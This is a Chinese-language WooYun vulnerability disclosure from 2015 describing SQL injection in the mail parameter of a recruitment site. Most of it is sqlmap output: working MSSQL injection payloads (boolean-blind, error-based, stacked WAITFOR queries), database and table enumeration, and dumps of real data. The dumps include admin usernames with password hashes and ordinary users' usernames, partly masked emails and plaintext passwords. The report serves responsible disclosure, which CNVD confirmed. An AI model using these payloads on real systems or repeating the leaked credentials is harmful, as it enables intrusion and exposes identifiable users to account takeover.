乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-17: 细节已通知厂商并且等待厂商处理中 2015-09-19: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-29: 细节向核心白帽子及相关领域专家公开 2015-10-09: 细节向普通白帽子公开 2015-10-19: 细节向实习白帽子公开 2015-11-03: 细节向公众公开
好人才网主站SQL注入漏洞,泄露13W 左右的用户注册信息(DBA权限)
注入点:http://**.**.**.**/ajax/mail.asp?mail= 检测发现是DBA 权限。。。。直接SQLMAP 跑下。。。。发现多达13W 左右的用户注册量 Database: haorencai+------------------+---------+| Table | Entries |+------------------+---------+| dbo.hrc_all_user | 130987 |+------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: mail Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: mail=' AND 5701=5701 AND 'nMdb'='nMdb Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: mail=' AND 6100=CONVERT(INT,(CHAR(58) CHAR(105) CHAR(110) CHAR(114) CHAR(58) (SELECT (CASE WHEN (6100=6100) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(122) CHAR(104) CHAR(114) CHAR(58))) AND 'moZm'='moZm Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: mail='; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: mail=' WAITFOR DELAY '0:0:5'-----[19:56:39] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000[19:56:39] [INFO] fetching database names[19:56:40] [INFO] heuristics detected web page charset 'GB2312'[19:56:40] [INFO] the SQL query used returns 13 entriesavailable databases [13]:[*] 1tian1ge[*] hanshan-oa[*] haorencai[*] haorencai-20110809[*] hsd-v2[*] htj-oa[*] hxa_oa[*] korea_hospital[*] master[*] model[*] msdb[*] oa-yt[*] tempdbcurrent database: 'haorencai'current user: 'haorencai-db'Database: haorencai[45 tables]+-------------------------------+| haorencai-db.hrc_pos_view || haorencai-db.hrc_store_resume || dtproperties || hrc_ad_company || hrc_ad_personal || hrc_ad_phone || hrc_adv || hrc_advice || hrc_all_user || hrc_area || hrc_career_keyword || hrc_collect_position || hrc_collect_resume || hrc_com_base || hrc_com_pay || hrc_com_position || hrc_comment || hrc_document || hrc_job_keyword || hrc_link || hrc_manage || hrc_messenger || hrc_notice || hrc_per_base || hrc_per_cert || hrc_per_disp || hrc_per_edus || hrc_per_exp || hrc_per_lang || hrc_per_pay || hrc_per_phone || hrc_per_train || hrc_quick_base || hrc_quick_classify || hrc_report || hrc_resume_visited || hrc_send_resume || hsd_attractions || hsd_city || hsd_comment || hsd_driver || hsd_keyword || sungsin_job || sysconstraints || syssegments |+-------------------------------+
发现用户的密码是明文 醉了 另外管理员账号和密码也泄露了。。。。
Database: haorencai+-------------------+---------+| Table | Entries |+-------------------+---------+| dbo.hrc_messenger | 21388 |+-------------------+---------+[20:20:59] [INFO] retrieved: 82034Database: haorencai+---------------------+---------+| Table | Entries |+---------------------+---------+| dbo.hrc_ad_personal | 82034 |+---------------------+---------+13万注册用户信息,其中包括账号和密码 邮箱等 并且竟然都是明文 醉了。。。。Database: haorencaiTable: hrc_all_user[12 columns]+-------------+---------------+| Column | Type |+-------------+---------------+| acceptEmail | bit || add_date | smalldatetime || autoid | int || from_do | varchar || log_hits | smallint || send_date | smalldatetime || send_date2 | smalldatetime || up_date | smalldatetime || user_id | varchar || user_mail | varchar || user_pass | varchar || user_type | tinyint |+-------------+---------------+Database: haorencaiTable: hrc_manage[5 columns]+----------+---------+| Column | Type |+----------+---------+| ad_name | varchar || ad_pass | varchar || ad_power | varchar || ad_role | int || id | int |+----------+---------+Database: haorencaiTable: hrc_manage[9 entries]+-----------+------------------+---------------------------+| ad_name | ad_pass | ad_power |+-----------+------------------+---------------------------+| aileen | cc2bdf6614f728e2 | 0,1,2,3,4,5,6,7,8 || apple42 | 90721aa2c76b2d48 | 0,1,2,3,4,5,6,7,8,9,11 || arch | a5d420fbc2491416 | 0,1,2,3,4,5,6,7,8,9,10,11 || chm726 | d01b294f3b53dd10 | 0,1,2,3,4,5,6,7,8,9,10,11 || clzheng | cebc5cc990e471a0 | 0 || happyds33 | aec399df03c6dde1 | 0,1,2,3,4,5,6,7,8,9,11 || jinsudo | a8a22c569110997e | 0,1,2,3,4,5,6,7,8,9,10,11 || lishuo | 9f413d19e73fc1cf | 0,1,2,3,4,5,6,8 || sff | 3608acabbcaac14b | 0,1,2,3,4,5,6,11 |+-----------+------------------+---------------------------+Database: haorencaiTable: hrc_all_user[13 entries]+--------+------------+---------+--------------------+--------------------+----------+-----------+---------------------------+--------------------+------------+--------------------+-------------+| autoid | user_id | user_mail | user_pass +--------+------------+---------+--------------------+--------------------+----------+-----------+---------------------------+--------------------+------------+--------------------+-------------+| 100 | ab120 | tingting1984118@**.**.**.** | | 1984118 | 1000 | limei1212 | limei-1212@**.**.**.** | 9172002 | 10000 | weilin123 | weifei11@**.**.**.** | 123123 | 100000 | youchenkst | zhuxiang0450@**.**.**.** | 521025 | 100001 | 2浪神 272897483@**.**.**.** wkx1988210| 100002 | wsszera | 871934416@**.**.**.** | 60551519 | 100003 | wsszeraa | 469609582@**.**.**.** | 60551519 | 100004 | woaimeng | 1065607654@**.**.**.** | 1524709312| 100005 | qingti |qingting52020@**.**.**.** | 110110 | 100006 | danjie1 | 1481428961@**.**.**.** | 269967557 | 100007 | wangyasong | 328436718@**.**.**.**> | 328436718 | 100008 | h7875234 | xiaohua80231314@**.**.**.** | 7875234 | 100009 | 1835240830 | 343827025@**.**.**.** | +--------+------------+---------+--------------------+----------
你们比较专业。。。
危害等级:高
漏洞Rank:13
确认时间:2015-09-19 18:30
CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无